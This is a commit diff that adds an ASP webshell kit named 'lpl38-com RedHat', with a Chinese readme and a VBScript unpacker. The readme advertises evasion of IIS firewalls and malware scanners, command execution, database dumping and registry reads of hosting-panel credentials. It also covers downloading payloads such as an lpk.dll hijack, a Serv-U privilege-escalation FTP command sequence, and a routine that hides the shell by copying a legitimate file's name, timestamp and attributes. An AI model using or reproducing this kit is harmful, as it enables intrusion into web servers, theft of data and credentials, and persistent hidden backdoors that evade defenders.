update source lpl38-com webshell

Please check it

asp/lpl38-com-RedHat/readme.txt

@@ -0,0 +1,153 @@
+操作之前必看。
+一、 整体介绍
+
+　　　 　本身代码经过变量转换和替换字符加密,可完美过安全狗,护卫神,D盾,safe3 Waf,KOasp木马查杀等IIS防火墙和查杀工具。
+　程序结合海洋顶端asp木马、老兵asp木马、Drakblade暗黑之剑1.3版本、05年到13年主流asp木马的优点进行开发完善制作。
+　程序在目录检测功能、隐藏功能、数据库操作和提权处做了较大改进，具体请看下列介绍
+
+二、 提交代码经过ascii 2次转码post提交过IIS安全狗,护卫神,D盾,safe3 Waf等IIS防火墙拦截代码。
+
+三、 登陆成功后显示＂欢迎界面＂,＂欢迎界面＂显示服务器安全指数，等级分为　高、中、低三等级，根据wscript.shell磁盘根目录是否可读取等功能判断。
+　第一项显示：服务器iis版本、服务器超时时间、以及session信息、服务器ＣＰＵ数量、主机名、默认管理员信息、Terminal Service终端端口（需要wscript.shell组件支持）支持脚本探测(aspx,php,pl)功能，支持bing查询同服务器所有支持aspx脚本站点。
+第二项显示：系统当前路径变量。
+　 第三项显示：磁盘根目录的读取权限问题（判断是否可跨站）。
+第四项显示：常用组件信息，左侧11个为危险组件，右侧11个为安全组件。
+　 第五项显示：读取c:\windows\system32\sethc.exe　和　c:\windows\system32\magnify.exe 文件的属性、时间、文件体积，从而判断是否被入侵。
+
+四、 右上角的ZONE-H图标为一键提交被黑网页到被黑站点统计www.zone-h.com.cn,个人信息请编辑程序修改,或用生成器生成。
+五、 WEB根目录和本程序目录都可以转入文件操作页。
+　文件操作一：左侧为磁盘和快捷不安全目录查看（目录为智能判断，不存在则不显示）
+　文件操作二：右侧为文件操作模块和文件夹操作模块。
+文件操作支持浏览器模式打开、编辑(支持UTF-8模式编辑)、复制、移动、删除（支持强制删除只读属性文件）、修改属性为隐藏or正常、数据库模式编辑。
+文件夹操作支持修改文件夹属性、删除、复制、移动
+数据库模式编辑支持查看内容、修改内容、删除内容、拖库。
+六、 功能一分为三项功能
+目录检测功能，补丁检测功能以及端口扫描功能。这三项功能不需要服务器过多脚本支持，故而放到一起。
+＊＊＊目录扫描:
+支持单文件检测，目录检测，是否循环所有磁盘，是否选择深度目录扫描和子目录扫描(目录扫描结尾必须加入“\”)
+　　　　　单文件检测格式：
+c:\Program Files (x86)\Helicon\ISAPI_Rewrite3\Rewrite.log
+　　　　　多文件检测格式：
+c:\Program Files (x86)\Helicon\ISAPI_Rewrite3\Rewrite.log
+d:\recycler\cmd.exe
+单文件循环磁盘检测格式：
+x:\Program Files (x86)\Helicon\ISAPI_Rewrite3\Rewrite.log
+多文件循环磁盘检测格式：
+x:\Program Files (x86)\Helicon\ISAPI_Rewrite3\Rewrite.log
+x:\recycler\cmd.exe
+　单目录扫描格式(可选是否扫描子目录或文件)：
+d:\recycler\
+多目录扫描格式(可选是否扫描子目录或文件)：
+d:\recycler\
+c:\program files\
+单目录循环扫描格式(需改磁盘名称为“x”、可选是否扫描子目录或文件)
+x:\program files\
+多目录循环扫描格式(需改磁盘名称为“x”、可选是否扫描子目录或文件)
+x:\program files\
+x:\recycler\
+　混合模式扫描格式：（混合模式不如循环扫描磁盘强大，主要是选择）
+c:\boot.ini
+x:\recycler\cmd.exe
+c:\php\
+x:\recycler\
+......可自行添加
+注：一般扫描只选择循磁盘＋不包含文件＋不包含子目录＋显示不可读项＋显示不可写项，就足够了，就是默认选项，如果要深度扫描请选择（子目录＋包含文件）
+＊＊＊补丁检测：
+　补丁检测理论为检测c:\windows\KB*****.log文件是否存在从而判断是否安装安全补丁。
+补丁检测格式：KB952004@MS09-012
+　@前的为KB*****.log去掉.log
+　@后的为漏洞名称注释，可自设,例：KB123456@PR提权漏洞
+　注；补丁检测只支持windows2003不支持windows2008
+＊＊＊端口扫描：
+　端口扫描不多做介绍。
+七、功能二分为三项功能：
+检测注册表，下载到服务器，文件搜（目录）搜索
+＊＊＊检测注册表：
+检测注册表需要wscript.shell组件支持。支持多项检测。
+　格式：
+HKEY_LOCAL_MACHINE\SOFTWARE\MySQL AB\MySQL Server 5.0\
+HKEY_LOCAL_MACHINE\software\hzhost\config\settings\sysstr
+HKEY_LOCAL_MACHINE\software\hzhost\config\settings\svrpass
+HKEY_LOCAL_MACHINE\software\hzhost\config\settings\sysdbname
+HKEY_LOCAL_MACHINE\software\hzhost\config\settings\systemroot
+HKEY_LOCAL_MACHINE\software\hzhost\config\settings\sysdbuser
+HKEY_LOCAL_MACHINE\software\hzhost\config\settings\sysdbsa
+　读不到或错误项会给出回显。
+＊＊＊下载到服务器：
+　下载到服务器支持多项下载，默认覆盖已存在文件，支持下载成功回显，支持错误回显。（需服务器支持XMLHTTP组件，服务器支持外网连接）
+　例：
+下载地址|下载目录
+
+http://127.0.0.1/1/text1.txt|d:\web1\title.asp
+
+http://127.0.0.1/2/text2.txt|d:\web1\title.html
+
+http://127.0.0.1/3/text3.txt|c:\title.bat
+
+http://127.0.0.1/3/text3.txt|c:\lpk.dll '先进行可写目录检测，然后再替换进行lpl.dll下载可增加提权成功几率。
+
+＊＊＊搜索文件或文件夹：
+搜索文件：
+支持后缀名检测：
+　格式：
+|asp|asa|cer|cdx|aspx|asax|ascx|cs|jsp|php|txt|inc|ini|js|htm|html|xml|config|
+　可选择是否扫描子目录。
+搜索目录：
+　搜索目录支持是否选择子目录。
+八、数据库操作：
+　数据库操作支持2种数据库(access,Mssql,其中mssql支持mssql2000,mssql2005)。
+Access操作方式：在数据库功能选择下拉第三项输入.mdb文件地址，点击提交按钮则可进行操作；或者点击文件操作页选择数据库类文件　点击数据库　则可进行操作。
+Access支持编辑内容、修改、删除、拖库等。
+　 Mssql2000和Mssql2005操作方式：
+选择数据库操作大项－SQL SERVER- 输入ip,端口，帐户，密码，数据库名称，则可进入Sqlserver数据库操作模块。
+SQL SERVER操作支持执行命令，恢复组件（SQLSERVER2005若不能执行，请执行一键恢复功能）、执行SQLSERVER语句等。
+九、执行CMD命令：
+　本版本程序对于CMD命令执行未做大的改动。(未加入调用CLSID组件，因为免杀问题暂时放弃了)，需要(wscript.shell组件支持)。
+　　　不过加入了/c显示模式，并未写死，大家可以自己设置，可以当做程序执行。
+十、用户进程：
+　本版本对用户进程做了大的改动，支持用户详细显示，支持用户隶属于组显示、支持管理员组以及详细介绍。
+十一、Serveru提权：
+　本次Serveru提权功能拷贝DarkBlade的部分代码，支持成功后显示回显。
+　 默认加入的FTP帐户为go，密码为od，端口为60000
+　 登陆命令(一行一行敲)：
+ftp
+open 127.0.0.1 60000
+go
+od
+quote site exec net user
+十二、隐藏小马：
+此功能原创，隐藏过程国内少见。下面先来介绍理论思路。
+　在asp SHELL隐藏历史中出现各种隐藏方法，包括早期的include包含jpg文件，带点文件夹,后期的系统保留文件名(nul,lpt,prn等)以及防删除(修改属性只读＋隐藏＋系统)
+　这些虽然有一定优势，但是在发展长河中已经起了专门的防御查杀工具，那么有没有一种办法高强度伪装隐藏的呢？有！下面请看杀猪刀隐藏自身技术。
+隐藏分为7个步骤，1查找目录，2选取正常目标文件，3隐藏自身，4复制属性时间,5伪装名称，6减少体积，7增加参数
+详细介绍：
+例如一个网站结构如下：
+
+http://www.1937cn.net/
+
+/index.asp
+/conn.asp
+/database/database.mdb
+/admin/admin_login.asp
+/admin/admin_check.asp
+/admin/upload.asp
+/admin/admin_index.asp
+
+当触发隐藏小马功能后则：
+执行第一步，查找目录，通过遍历web根目录搜索到asp目录最多的文件
+执行第二步，选取文件，随机通过asp目录最多的文件夹内取出一个为要伪装成的正常目标文件，例：admin/admin_index.asp
+执行第三步，隐藏自身，首先通过xmlhttp获取要伪装的目标文件(http://www.1937cn.net/admin/index.asp)的内容界面，通过ie打开显示此文件的界面
+执行第四步，复制属性时间，复制admin/index.asp文件的属性以及时间
+执行第五步，伪装名称，通过自带的几个后缀随机选择一个伪装shell的名称（_request_send_sumbit_include_config_open_form_month_data）
+　　，例：admin/admin_form.asp
+执行第六步，减少体积，通过截取自身28k文件操作代码为小马，加入上述功能
+执行第七步，增加参数，参数即为小马登陆密码通过修改代码自行设置，格式:admin/admin_form.asp?pass
+这样，一个小马的隐藏就完成了，通过安全狗，护卫神,koasp查杀工具，均查杀不出来。
+通过查看时间admin/admin_form.asp文件的时间仿造的admin/admin_index.asp文件的时间。
+体积仅28k，登陆需要参数，文件名均伪装正常文件+后缀格式，完美防爆破。
+
+------------------------------
+注：大家可能用着不习惯，不过后期就习惯了，你会发现它的诸多优点。
+Ps:不足之处：感觉提权不是很强大，因为个人能力有限，解包需要用生成器，不能调用Clsid执行CMD，对有些浏览器兼容不大好，完美支持IE6、IE7、IE8。
+生成器支持添加统计，当然你也可以做为后门使用,可以设置小马后缀，可以设置扫描目录等。。。
+

asp/lpl38-com-RedHat/解包unpack.vbs

@@ -0,0 +1,50 @@
+
+Dim rs, ws, fso, conn, stream, connStr, theFolder,mdbfile,dir
+On Error Resume Next
+mdbfile="RedHat.mdb"
+dir="."
+Set rs = CreateObject("ADODB.RecordSet")
+Set stream = CreateObject("ADODB.Stream")
+Set conn = CreateObject("ADODB.Connection")
+Set fso = CreateObject("Scripting.FileSystemObject")
+connStr = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&mdbfile&";"
+conn.Open connStr
+rs.Open "FileData", conn, 1, 1
+stream.Open
+stream.Type = 1
+Do Until rs.Eof
+	str = rs("binPath")
+	If Left(str, 1) = "\" Then str = Mid(str, 2)
+	theFolder = dir&"\"&Left(str, InStrRev(str, "\"))
+	If fso.FolderExists(theFolder) = False Then
+		createFolder(theFolder)
+	End If
+	stream.SetEos()
+	stream.Write rs("binContent")
+	stream.SaveToFile dir&"\"&str, 2
+	rs.MoveNext
+Loop
+fso.deletefile"unpack.vbs"
+rs.Close
+conn.Close
+stream.Close
+Set ws = Nothing
+Set rs = Nothing
+Set stream = Nothing
+Set conn = Nothing
+Set fso=nothing
+Wscript.Echo "ËùÓÐÎļþÊÍ·ÅÍê±Ï!"
+Sub createFolder(thePath)
+	Dim i
+	i = Instr(thePath, "\")
+	Do While i > 0
+		If Not fso.FolderExists(Left(thePath, i)) Then
+			fso.CreateFolder(Left(thePath, i - 1))
+		End If
+		If InStr(Mid(thePath, i + 1), "\") Then
+			i = i + Instr(Mid(thePath, i + 1), "\")
+		Else
+			i = 0
+		End If
+	Loop
+End Sub